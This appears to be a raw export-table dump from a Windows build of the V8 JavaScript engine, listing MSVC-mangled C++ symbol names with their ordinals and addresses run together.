                                                                                                                                                                                                                                    ?Call@TurboAssembler@internal@v8@@QEAAXPEAVLabel@23@@Z38370x1405596a0
                                                                                                                                                                                                                                    ?Call@TurboAssembler@internal@v8@@QEAAXV?$Handle@VCode@internal@v8@@@23@W4Mode@RelocInfo@23@@Z38380x1405f4390
                                                                                                                                                                                                                                    ?Call@TurboAssembler@internal@v8@@QEAAXVExternalReference@23@@Z38390x1405f4410
                                                                                                                                                                                                                                    ?Call@TurboAssembler@internal@v8@@QEAAXVOperand@23@@Z38400x1405f4440
                                                                                                                                                                                                                                    ?Call@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z38410x1405596b0
                                                                                                                                                                                                                                    ?Call@TurboAssembler@internal@v8@@QEAAX_KW4Mode@RelocInfo@23@@Z38420x1405f44a0
                                                                                                                                                                                                                                    ?CallAnyReceiver@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z38430x140a5a7f0
                                                                                                                                                                                                                                    ?CallApiCallback@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38440x140c0d210
                                                                                                                                                                                                                                    ?CallAsConstructor@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@HQEAV?$Local@VValue@v8@@@2@@Z38450x140c792c0
                                                                                                                                                                                                                                    ?CallAsFunction@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@HQEAV52@@Z38460x140c79620
                                                                                                                                                                                                                                    ?CallBuiltin@TurboAssembler@internal@v8@@QEAAXW4Builtin@23@@Z38470x1405f44f0
                                                                                                                                                                                                                                    ?CallBuiltinByIndex@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z38480x1405f4560
                                                                                                                                                                                                                                    ?CallCFunction@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@V?$Optional@VMachineType@internal@v8@@@base@4@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z38490x1410a7d10
                                                                                                                                                                                                                                    ?CallCFunction@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@V?$Optional@VMachineType@internal@v8@@@base@4@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z38500x141218380
                                                                                                                                                                                                                                    ?CallCFunction@TurboAssembler@internal@v8@@QEAAXVExternalReference@23@H@Z38510x1405f4640
                                                                                                                                                                                                                                    ?CallCFunction@TurboAssembler@internal@v8@@QEAAXVRegister@23@H@Z38520x1405f4680
                                                                                                                                                                                                                                    ?CallCFunctionN@CodeAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV?$Signature@VMachineType@internal@v8@@@34@HPEBQEAV5234@@Z38530x1410a7d50
                                                                                                                                                                                                                                    ?CallCFunctionWithCallerSavedRegisters@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@W4SaveFPRegsMode@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z38540x1410a7da0
                                                                                                                                                                                                                                    ?CallCFunctionWithCallerSavedRegisters@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@W4SaveFPRegsMode@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z38550x141218670
                                                                                                                                                                                                                                    ?CallCFunctionWithoutFunctionDescriptor@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z38560x1410a7dd0
                                                                                                                                                                                                                                    ?CallCFunctionWithoutFunctionDescriptor@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@VMachineType@34@V?$initializer_list@U?$pair@VMachineType@internal@v8@@PEAVNode@compiler@23@@std@@@std@@@Z38570x1412186d0
                                                                                                                                                                                                                                    ?CallCheckStackGuardState@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ38580x14056e170
                                                                                                                                                                                                                                    ?CallCodeDataContainerObject@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z38590x1405f4920
                                                                                                                                                                                                                                    ?CallCodeObject@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z38600x1405f4930
                                                                                                                                                                                                                                    ?CallCodeTObject@TurboAssembler@internal@v8@@QEAAXVRegister@23@@Z38610x1405f4930
                                                                                                                                                                                                                                    ?CallDebugOnFunctionCall@MacroAssembler@internal@v8@@QEAAXVRegister@23@000@Z38620x1405f4960
                                                                                                                                                                                                                                    ?CallDescriptorOf@compiler@internal@v8@@YAPEBVCallDescriptor@123@QEBVOperator@123@@Z38630x140097e50
                                                                                                                                                                                                                                    ?CallEnqueueMicrotask@MicrotaskQueue@internal@v8@@SA_KPEAVIsolate@23@_J_K@Z38640x140b59f30
                                                                                                                                                                                                                                    ?CallEphemeronKeyBarrier@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4SaveFPRegsMode@23@@Z38650x1405f4bc0
                                                                                                                                                                                                                                    ?CallEpilogue@CodeAssembler@compiler@internal@v8@@AEAAXXZ38660x1410a7e00
                                                                                                                                                                                                                                    ?CallForDeoptimization@TurboAssembler@internal@v8@@QEAAXW4Builtin@23@HPEAVLabel@23@W4DeoptimizeKind@23@11@Z38670x1405f4e40
                                                                                                                                                                                                                                    ?CallForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38680x140c0d230
                                                                                                                                                                                                                                    ?CallForwardVarargs@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KI@Z38690x1410c28b0
                                                                                                                                                                                                                                    ?CallFunction@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z38700x140c0d250
                                                                                                                                                                                                                                    ?CallFunctionForwardVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38710x140c0d290
                                                                                                                                                                                                                                    ?CallIsCharacterInRangeArray@RegExpMacroAssemblerX64@internal@v8@@AEAAXPEBV?$ZoneList@VCharacterRange@internal@v8@@@23@@Z38720x14056e230
                                                                                                                                                                                                                                    ?CallJSRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@HVRegisterList@234@@Z38730x140a5a8b0
                                                                                                                                                                                                                                    ?CallJSStubImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@AEBVCallInterfaceDescriptor@34@V?$TNode@VObject@internal@v8@@@34@11V?$Optional@V?$TNode@VObject@internal@v8@@@internal@v8@@@base@4@V?$TNode@UInt32T@internal@v8@@@34@V?$initializer_list@PEAVNode@compiler@internal@v8@@@std@@@Z38740x1410a7e20
                                                                                                                                                                                                                                    ?CallN@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAVCallDescriptor@234@HPEBQEAV5234@@Z38750x141218730
                                                                                                                                                                                                                                    ?CallNWithFrameState@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAVCallDescriptor@234@HPEBQEAV5234@@Z38760x141218730
                                                                                                                                                                                                                                    ?CallOnceImpl@base@v8@@YAXPEAU?$atomic@E@std@@V?$function@$$A6AXXZ@4@@Z38770x140ff2bf0
                                                                                                                                                                                                                                    ?CallPrologue@CodeAssembler@compiler@internal@v8@@AEAAXXZ38780x1410a7f30
                                                                                                                                                                                                                                    ?CallProperty@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z38790x140a5a8d0
                                                                                                                                                                                                                                    ?CallRecordWriteStub@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@W4StubCallMode@23@@Z38800x1405f4ee0
                                                                                                                                                                                                                                    ?CallRecordWriteStubSaveRegisters@TurboAssembler@internal@v8@@QEAAXVRegister@23@0W4RememberedSetAction@23@W4SaveFPRegsMode@23@W4StubCallMode@23@@Z38810x1405f50c0
                                                                                                                                                                                                                                    ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@@Z38820x140a5aa10
                                                                                                                                                                                                                                    ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegister@234@@Z38830x140a5aa30
                                                                                                                                                                                                                                    ?CallRuntime@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegisterList@234@@Z38840x140a5aa50
                                                                                                                                                                                                                                    ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBUFunction@Runtime@34@_K@Z38850x1410c2980
                                                                                                                                                                                                                                    ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4FunctionId@Runtime@34@@Z38860x1410c2a60
                                                                                                                                                                                                                                    ?CallRuntime@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4FunctionId@Runtime@34@_K@Z38870x1410c2a90
                                                                                                                                                                                                                                    ?CallRuntime@MacroAssembler@internal@v8@@QEAAXPEBUFunction@Runtime@23@HW4SaveFPRegsMode@23@@Z38880x1405f5300
                                                                                                                                                                                                                                    ?CallRuntime@MacroAssembler@internal@v8@@QEAAXW4FunctionId@Runtime@23@HW4SaveFPRegsMode@23@@Z38890x1405596c0
                                                                                                                                                                                                                                    ?CallRuntime@MacroAssembler@internal@v8@@QEAAXW4FunctionId@Runtime@23@W4SaveFPRegsMode@23@@Z38900x140559700
                                                                                                                                                                                                                                    ?CallRuntimeForPair@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegister@234@VRegisterList@234@@Z38910x140a5aad0
                                                                                                                                                                                                                                    ?CallRuntimeForPair@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4FunctionId@Runtime@34@VRegisterList@234@1@Z38920x140a5ab10
                                                                                                                                                                                                                                    ?CallRuntimeImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4FunctionId@Runtime@34@V?$TNode@VObject@internal@v8@@@34@V?$initializer_list@V?$TNode@VObject@internal@v8@@@internal@v8@@@std@@@Z38930x1410a7f50
                                                                                                                                                                                                                                    ?CallRuntimeParametersOf@compiler@internal@v8@@YAAEBVCallRuntimeParameters@123@PEBVOperator@123@@Z38940x1403a2160
                                                                                                                                                                                                                                    ?CallScript@Execution@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSFunction@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z38950x140b805c0
                                                                                                                                                                                                                                    ?CallStubN@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4StubCallMode@34@AEBVCallInterfaceDescriptor@34@HPEBQEAV5234@@Z38960x1410a8170
                                                                                                                                                                                                                                    ?CallStubRImpl@CodeAssembler@compiler@internal@v8@@AEAAPEAVNode@234@W4StubCallMode@34@AEBVCallInterfaceDescriptor@34@V?$TNode@VObject@internal@v8@@@34@2V?$initializer_list@PEAVNode@compiler@internal@v8@@@std@@@Z38970x1410a8230
                                                                                                                                                                                                                                    ?CallUndefinedReceiver@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z38980x140a5ab40
                                                                                                                                                                                                                                    ?CallVarargs@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z38990x140c0d2b0
                                                                                                                                                                                                                                    ?CallWasm@Execution@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VCode@internal@v8@@@23@_KV?$Handle@VObject@internal@v8@@@23@2@Z39000x140b80680
                                                                                                                                                                                                                                    ?CallWasm@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBUWasmModule@wasm@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@AEBUFeedbackSource@234@@Z39010x1410c2ac0
                                                                                                                                                                                                                                    ?CallWithArrayLike@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39020x140c0d2d0
                                                                                                                                                                                                                                    ?CallWithArrayLike@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBVCallFrequency@234@AEBUFeedbackSource@234@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z39030x1410c2bb0
                                                                                                                                                                                                                                    ?CallWithSpread@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@VRegisterList@234@H@Z39040x140a5ad90
                                                                                                                                                                                                                                    ?CallWithSpread@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z39050x140c0d2f0
                                                                                                                                                                                                                                    ?CallWithSpread@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@IAEBVCallFrequency@234@AEBUFeedbackSource@234@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z39060x1410c2cb0
                                                                                                                                                                                                                                    ?Call_WithFeedback@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z39070x140c0d310
                                                                                                                                                                                                                                    ?Callable@Type@compiler@internal@v8@@SA?AV1234@XZ39080x14057e910
                                                                                                                                                                                                                                    ?CallableFor@Builtins@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4Builtin@23@@Z39090x140c12770
                                                                                                                                                                                                                                    ?CallableFunction@Type@compiler@internal@v8@@SA?AV1234@XZ39100x14057e920
                                                                                                                                                                                                                                    ?CallableProxy@Type@compiler@internal@v8@@SA?AV1234@XZ39110x14057e930
                                                                                                                                                                                                                                    ?CallbackEvent@CodeEventLogger@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z39120x1400971a0
                                                                                                                                                                                                                                    ?CallbackEvent@ProfilerListener@internal@v8@@UEAAXV?$Handle@VName@internal@v8@@@23@_K@Z39130x1408623d0
                                                                                                                                                                                                                                    ?CalleeSaveRegisters@CallInterfaceDescriptor@internal@v8@@QEBA_NXZ39140x14057e940
                                                                                                                                                                                                                                    ?CalleeSavedFPRegisters@CallDescriptor@compiler@internal@v8@@QEBA?AV?$RegListBase@VXMMRegister@internal@v8@@@34@XZ39150x14057e950
                                                                                                                                                                                                                                    ?CalleeSavedRegisters@CallDescriptor@compiler@internal@v8@@QEBA?AV?$RegListBase@VRegister@internal@v8@@@34@XZ39160x14057e960
                                                                                                                                                                                                                                    ?CanAddressRelativeToRootsRegister@InstructionSelector@compiler@internal@v8@@QEBA_NAEBVExternalReference@34@@Z39170x14105c3c0
                                                                                                                                                                                                                                    ?CanAllocateInReadOnlySpace@Factory@internal@v8@@AEAA_NXZ39180x140b21db0
                                                                                                                                                                                                                                    ?CanAllocateInReadOnlySpace@HeapAllocator@internal@v8@@QEBA_NXZ39190x14053e320
                                                                                                                                                                                                                                    ?CanAllocateInReadOnlySpace@LocalFactory@internal@v8@@AEAA_NXZ39200x140098380
                                                                                                                                                                                                                                    ?CanAllocateSharedPages@PageAllocator@base@v8@@UEAA_NXZ39210x140098380
                                                                                                                                                                                                                                    ?CanAllocateSubspaces@VirtualAddressSpace@base@v8@@UEAA_NXZ39220x140ffc490
                                                                                                                                                                                                                                    ?CanAllocateSubspaces@VirtualAddressSubspace@base@v8@@UEAA_NXZ39230x140097530
                                                                                                                                                                                                                                    ?CanBeActivated@IncrementalMarking@internal@v8@@QEAA_NXZ39240x140af5bf0
                                                                                                                                                                                                                                    ?CanBeAsserted@Type@compiler@internal@v8@@QEBA_NXZ39250x14057e970
                                                                                                                                                                                                                                    ?CanBeDeprecated@MapRef@compiler@internal@v8@@QEBA_NXZ39260x141017420
                                                                                                                                                                                                                                    ?CanBeInSharedOldSpace@SharedHeapSerializer@internal@v8@@SA_NVHeapObject@23@@Z39270x1407d5220
                                                                                                                                                                                                                                    ?CanBeInvokedWith@AsmFunctionType@wasm@internal@v8@@UEAA_NPEAVAsmType@234@AEBV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@@Z39280x14072f630
                                                                                                                                                                                                                                    ?CanBeInvokedWith@AsmOverloadedFunctionType@wasm@internal@v8@@EEAA_NPEAVAsmType@234@AEBV?$ZoneVector@PEAVAsmType@wasm@internal@v8@@@34@@Z39290x14072f850
                                                                                                                                                                                                                                    ?CanBeNullOrUndefined@NodeProperties@compiler@internal@v8@@SA_NPEAVJSHeapBroker@234@PEAVNode@234@VEffect@234@@Z39300x141033d80
                                                                                                                                                                                                                                    ?CanBePrimitive@NodeProperties@compiler@internal@v8@@SA_NPEAVJSHeapBroker@234@PEAVNode@234@VEffect@234@@Z39310x141033fa0
                                                                                                                                                                                                                                    ?CanBeRehashed@StartupData@v8@@QEBA_NXZ39320x140c79980
                                                                                                                                                                                                                                    ?CanBeSpilled@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z39330x14110a1c0
                                                                                                                                                                                                                                    ?CanBreakAtEntry@Debug@internal@v8@@QEAA_NV?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z39340x140bb7ca0
                                                                                                                                                                                                                                    ?CanContinue@TryCatch@v8@@QEBA_NXZ39350x140c79990
                                                                                                                                                                                                                                    ?CanCover@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@0@Z39360x14105c3f0
                                                                                                                                                                                                                                    ?CanCover@LiveRange@compiler@internal@v8@@QEBA_NVLifetimePosition@234@@Z39370x14110a220
                                                                                                                                                                                                                                    ?CanCoverTransitively@InstructionSelector@compiler@internal@v8@@QEBA_NPEAVNode@234@00@Z39380x14105c500
                                                                                                                                                                                                                                    ?CanDiscardMemory@Sweeper@internal@cppgc@@SA_NXZ39390x140097530
                                                                                                                                                                                                                                    ?CanExpandOldGeneration@Heap@internal@v8@@AEAA_N_K@Z39400x140aff5e0
                                                                                                                                                                                                                                    ?CanExpandOldGenerationBackground@Heap@internal@v8@@AEAA_NPEAVLocalHeap@23@_K@Z39410x140aff670
                                                                                                                                                                                                                                    ?CanHaveInternalField@internal@v8@@YA_NH@Z39420x140c799a0
                                                                                                                                                                                                                                    ?CanHaveMoreTransitions@TransitionsAccessor@internal@v8@@SA_NPEAVIsolate@23@V?$Handle@VMap@internal@v8@@@23@@Z39430x1408d3bb0
                                                                                                                                                                                                                                    ?CanInlineElementAccess@MapRef@compiler@internal@v8@@QEBA_NXZ39440x1410174b0
                                                                                                                                                                                                                                    ?CanMakeExternal@String@v8@@QEBA_NXZ39450x140c799d0
                                                                                                                                                                                                                                    ?CanPeel@LoopPeeler@compiler@internal@v8@@QEAA_NPEAVLoop@LoopTree@234@@Z39460x141097c90
                                                                                                                                                                                                                                    ?CanProduceSignalingNaN@InstructionSelector@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z39470x14105c5a0
                                                                                                                                                                                                                                    ?CanPromoteYoungAndExpandOldGeneration@Heap@internal@v8@@AEAA_N_K@Z39480x140aff740
                                                                                                                                                                                                                                    ?CanReadUnaligned@RegExpBytecodeGenerator@internal@v8@@UEBA_NXZ39490x140098380
                                                                                                                                                                                                                                    ?CanRegisterUnwindInfoForNonABICompliantCodeRange@WasmCodeManager@wasm@internal@v8@@SA_NXZ39500x14065fed0
                                                                                                                                                                                                                                    ?CanReserveAddressSpace@OS@base@v8@@CA_NXZ39510x140ff3740
                                                                                                                                                                                                                                    ?CanTailCall@CallDescriptor@compiler@internal@v8@@QEBA_NPEBV1234@@Z39520x14102b500
                                                                                                                                                                                                                                    ?CanTransition@MapRef@compiler@internal@v8@@QEBA_NXZ39530x141017520
                                                                                                                                                                                                                                    ?CanTreatHoleAsUndefined@JSNativeContextSpecialization@compiler@internal@v8@@AEAA_NAEBV?$ZoneVector@VMapRef@compiler@internal@v8@@@34@@Z39540x1411a1930
                                                                                                                                                                                                                                    ?CanUseRootsRegister@InstructionSelector@compiler@internal@v8@@QEBA_NXZ39550x14105c5c0
                                                                                                                                                                                                                                    ?Cancel@Cancelable@internal@v8@@AEAA_NXZ39560x14053e330
                                                                                                                                                                                                                                    ?Cancel@ConcurrentMarkerBase@internal@cppgc@@QEAA_NXZ39570x14051db20
                                                                                                                                                                                                                                    ?CancelAndWait@CancelableTaskManager@internal@v8@@QEAAXXZ39580x1407c7730
                                                                                                                                                                                                                                    ?CancelAndWait@OperationsBarrier@internal@v8@@QEAAXXZ39590x1407c72c0
                                                                                                                                                                                                                                    ?CancelCompilation@CompilationState@wasm@internal@v8@@QEAAXXZ39600x14068de70
                                                                                                                                                                                                                                    ?CancelIfShouldNotCompact@Compactor@internal@cppgc@@QEAA_NW4MarkingType@Heap@3@W4EmbedderStackState@3@@Z39610x14051eae0
                                                                                                                                                                                                                                    ?CancelInitialCompilation@CompilationState@wasm@internal@v8@@QEAAXXZ39620x14068deb0
                                                                                                                                                                                                                                    ?CancelScheduledExceptionFromTryCatch@Isolate@internal@v8@@QEAAXPEAVTryCatch@3@@Z39630x140b64ba0
                                                                                                                                                                                                                                    ?CancelTerminateExecution@Isolate@internal@v8@@QEAAXXZ39640x140b64bf0
                                                                                                                                                                                                                                    ?CancelTerminateExecution@Isolate@v8@@QEAAXXZ39650x140c79a30
                                                                                                                                                                                                                                    ?Canonicalize@CharacterSet@internal@v8@@QEAAXXZ39660x14084aec0
                                                                                                                                                                                                                                    ?CanonicalizeShuffle@InstructionSelector@compiler@internal@v8@@AEAAXPEAVNode@234@PEAEPEA_N@Z39670x14105c5d0
                                                                                                                                                                                                                                    ?CanonicalizeShuffle@SimdShuffle@wasm@internal@v8@@SAX_NPEAEPEA_N2@Z39680x140669e50
                                                                                                                                                                                                                                    ?CanonicalizeTimeZoneID@JSDateTimeFormat@internal@v8@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEBV45@@Z39690x1409897f0
                                                                                                                                                                                                                                    ?Capacity@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAAHXZ39700x14053e340
                                                                                                                                                                                                                                    ?Capacity@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAAHXZ39710x14053e340
                                                                                                                                                                                                                                    ?Capacity@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAAHXZ39720x14053e350
                                                                                                                                                                                                                                    ?Capacity@HashTableBase@internal@v8@@QEBAHXZ39730x14052dc20
                                                                                                                                                                                                                                    ?Capacity@NewSpace@internal@v8@@QEBA_KXZ39740x14053e360
                                                                                                                                                                                                                                    ?Capacity@OrderedNameDictionaryHandler@internal@v8@@SAHVHeapObject@23@@Z39750x1408f8b90
                                                                                                                                                                                                                                    ?Capacity@PagedSpace@internal@v8@@QEBA_KXZ39760x14053e390
                                                                                                                                                                                                                                    ?Capacity@StringTable@internal@v8@@QEBAHXZ39770x1408e3f00
                                                                                                                                                                                                                                    ?Capacity@SwissNameDictionary@internal@v8@@QEAAHXZ39780x14053e3a0
                                                                                                                                                                                                                                    ?Capacity@TransitionsAccessor@internal@v8@@IEAAHXZ39790x14053e3b0
                                                                                                                                                                                                                                    ?CapacityFor@SwissNameDictionary@internal@v8@@SAHH@Z39800x14053e3d0
                                                                                                                                                                                                                                    ?CapacityForLength@OSROptimizedCodeCache@internal@v8@@CAHH@Z39810x1408f4d50
                                                                                                                                                                                                                                    ?CapacityOffset@SwissNameDictionary@internal@v8@@SAHXZ39820x14053e400
                                                                                                                                                                                                                                    ?CaptureAndSetErrorStack@Isolate@internal@v8@@QEAA?AV?$MaybeHandle@VJSObject@internal@v8@@@23@V?$Handle@VJSObject@internal@v8@@@23@W4FrameSkipMode@23@V?$Handle@VObject@internal@v8@@@23@@Z39830x140b64c50
                                                                                                                                                                                                                                    ?CaptureDetailedStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@HW4StackTraceOptions@StackTrace@3@@Z39840x140b65b00
                                                                                                                                                                                                                                    ?Cast@AccessorPair@debug@v8@@SAPEAV123@PEAVValue@3@@Z39850x1400972c0
                                                                                                                                                                                                                                    ?Cast@AccessorSignature@v8@@SAPEAV12@PEAVData@2@@Z39860x1400972c0
                                                                                                                                                                                                                                    ?Cast@Array@v8@@SAPEAV12@PEAVValue@2@@Z39870x1400972c0
                                                                                                                                                                                                                                    ?Cast@ArrayBuffer@v8@@SAPEAV12@PEAVValue@2@@Z39880x1400972c0
                                                                                                                                                                                                                                    ?Cast@ArrayBufferView@v8@@SAPEAV12@PEAVValue@2@@Z39890x1400972c0
                                                                                                                                                                                                                                    ?Cast@BigInt64Array@v8@@SAPEAV12@PEAVValue@2@@Z39900x1400972c0
                                                                                                                                                                                                                                    ?Cast@BigInt@v8@@SAPEAV12@PEAVData@2@@Z39910x1400972c0
                                                                                                                                                                                                                                    ?Cast@BigIntObject@v8@@SAPEAV12@PEAVValue@2@@Z39920x1400972c0
                                                                                                                                                                                                                                    ?Cast@BigUint64Array@v8@@SAPEAV12@PEAVValue@2@@Z39930x1400972c0
                                                                                                                                                                                                                                    ?Cast@Boolean@v8@@SAPEAV12@PEAVData@2@@Z39940x1400972c0
                                                                                                                                                                                                                                    ?Cast@BooleanObject@v8@@SAPEAV12@PEAVValue@2@@Z39950x1400972c0
                                                                                                                                                                                                                                    ?Cast@CodeAssembler@compiler@internal@v8@@QEAA?AV?$CheckedNode@VObject@internal@v8@@$0A@@1234@PEAVNode@234@PEBD@Z39960x140098d90
                                                                                                                                                                                                                                    ?Cast@Context@v8@@SAPEAV12@PEAVData@2@@Z39970x1400972c0
                                                                                                                                                                                                                                    ?Cast@DataView@v8@@SAPEAV12@PEAVValue@2@@Z39980x1400972c0
                                                                                                                                                                                                                                    ?Cast@Date@v8@@SAPEAV12@PEAVValue@2@@Z39990x1400972c0
                                                                                                                                                                                                                                    ?Cast@External@v8@@SAPEAV12@PEAVValue@2@@Z40000x1400972c0
                                                                                                                                                                                                                                    ?Cast@FixedArray@v8@@SAPEAV12@PEAVData@2@@Z40010x1400972c0
                                                                                                                                                                                                                                    ?Cast@Float32Array@v8@@SAPEAV12@PEAVValue@2@@Z40020x1400972c0
                                                                                                                                                                                                                                    ?Cast@Float64Array@v8@@SAPEAV12@PEAVValue@2@@Z40030x1400972c0
                                                                                                                                                                                                                                    ?Cast@Function@v8@@SAPEAV12@PEAVValue@2@@Z40040x1400972c0
                                                                                                                                                                                                                                    ?Cast@FunctionTemplate@v8@@SAPEAV12@PEAVData@2@@Z40050x1400972c0
                                                                                                                                                                                                                                    ?Cast@Int16Array@v8@@SAPEAV12@PEAVValue@2@@Z40060x1400972c0
                                                                                                                                                                                                                                    ?Cast@Int32@v8@@SAPEAV12@PEAVData@2@@Z40070x1400972c0
                                                                                                                                                                                                                                    ?Cast@Int32Array@v8@@SAPEAV12@PEAVValue@2@@Z40080x1400972c0
                                                                                                                                                                                                                                    ?Cast@Int8Array@v8@@SAPEAV12@PEAVValue@2@@Z40090x1400972c0
                                                                                                                                                                                                                                    ?Cast@Integer@v8@@SAPEAV12@PEAVData@2@@Z40100x1400972c0
                                                                                                                                                                                                                                    ?Cast@Map@v8@@SAPEAV12@PEAVValue@2@@Z40110x1400972c0
                                                                                                                                                                                                                                    ?Cast@Module@v8@@SAPEAV12@PEAVData@2@@Z40120x1400972c0
                                                                                                                                                                                                                                    ?Cast@ModuleRequest@v8@@SAPEAV12@PEAVData@2@@Z40130x1400972c0
                                                                                                                                                                                                                                    ?Cast@Name@v8@@SAPEAV12@PEAVData@2@@Z40140x1400972c0
                                                                                                                                                                                                                                    ?Cast@Number@v8@@SAPEAV12@PEAVData@2@@Z40150x1400972c0
                                                                                                                                                                                                                                    ?Cast@NumberObject@v8@@SAPEAV12@PEAVValue@2@@Z40160x1400972c0
                                                                                                                                                                                                                                    ?Cast@Object@v8@@SAPEAV12@PEAVValue@2@@Z40170x1400972c0
                                                                                                                                                                                                                                    ?Cast@ObjectTemplate@v8@@SAPEAV12@PEAVData@2@@Z40180x1400972c0
                                                                                                                                                                                                                                    ?Cast@PrimitiveArray@v8@@SAPEAV12@PEAVData@2@@Z40190x1400972c0
                                                                                                                                                                                                                                    ?Cast@Private@v8@@SAPEAV12@PEAVData@2@@Z40200x1400972c0
                                                                                                                                                                                                                                    ?Cast@Promise@v8@@SAPEAV12@PEAVValue@2@@Z40210x1400972c0
                                                                                                                                                                                                                                    ?Cast@Proxy@v8@@SAPEAV12@PEAVValue@2@@Z40220x1400972c0
                                                                                                                                                                                                                                    ?Cast@RegExp@v8@@SAPEAV12@PEAVValue@2@@Z40230x1400972c0
                                                                                                                                                                                                                                    ?Cast@Resolver@Promise@v8@@SAPEAV123@PEAVValue@3@@Z40240x1400972c0
                                                                                                                                                                                                                                    ?Cast@Set@v8@@SAPEAV12@PEAVValue@2@@Z40250x1400972c0
                                                                                                                                                                                                                                    ?Cast@SharedArrayBuffer@v8@@SAPEAV12@PEAVValue@2@@Z40260x1400972c0
                                                                                                                                                                                                                                    ?Cast@Signature@v8@@SAPEAV12@PEAVData@2@@Z40270x1400972c0
                                                                                                                                                                                                                                    ?Cast@String@v8@@SAPEAV12@PEAVData@2@@Z40280x1400972c0
                                                                                                                                                                                                                                    ?Cast@StringObject@v8@@SAPEAV12@PEAVValue@2@@Z40290x1400972c0
                                                                                                                                                                                                                                    ?Cast@Symbol@v8@@SAPEAV12@PEAVData@2@@Z40300x1400972c0
